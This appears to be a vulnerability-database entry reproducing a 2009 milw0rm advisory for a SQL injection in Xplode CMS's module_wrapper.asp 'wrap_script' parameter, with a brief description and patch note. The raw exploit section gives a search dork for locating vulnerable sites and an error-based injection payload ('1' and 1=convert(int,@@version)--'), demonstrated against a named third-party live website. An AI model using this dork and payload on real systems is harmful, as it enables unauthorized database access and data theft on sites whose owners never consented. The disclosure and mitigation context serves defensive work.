Xplode Cms

vendor:

Xplode CMS

by:

PLATEN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Xplode CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The attacker can inject malicious SQL queries in the 'wrap_script' parameter of the 'module_wrapper.asp' script. This can allow the attacker to access or modify the data in the backend database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of Xplode CMS.

Source

Exploit-DB raw data:

#---------------------------------------------------------------------------------------------
# scriptname: Xplode Cms  
#
# Xplode SQL Injection Vulnerabilities
#
# Author: PLATEN
#
# contact: PLATEN.Secure[at]Gmail.com
#
# web: Www.ata-turk.tk & www.deltahacking.net
#
# big tnx: Dr.Trojan ~ Cru3l.b0y ~ b3hz4d  
#---------------------------------------------------------------------------------------------

dork: "Powered by Xplode CMS"

#----------------------------------------------------------------------------------------------

===[ SQL ]===


http://127.0.0.1/module_wrapper.asp?wrap_script=[sql]

example & demo:

http://www.snowawards.co.uk/module_wrapper.asp?wrap_script=1' and 1=convert(int,@@version)--


#----------------------------------------------------------------------------------------------

# milw0rm.com [2009-04-08]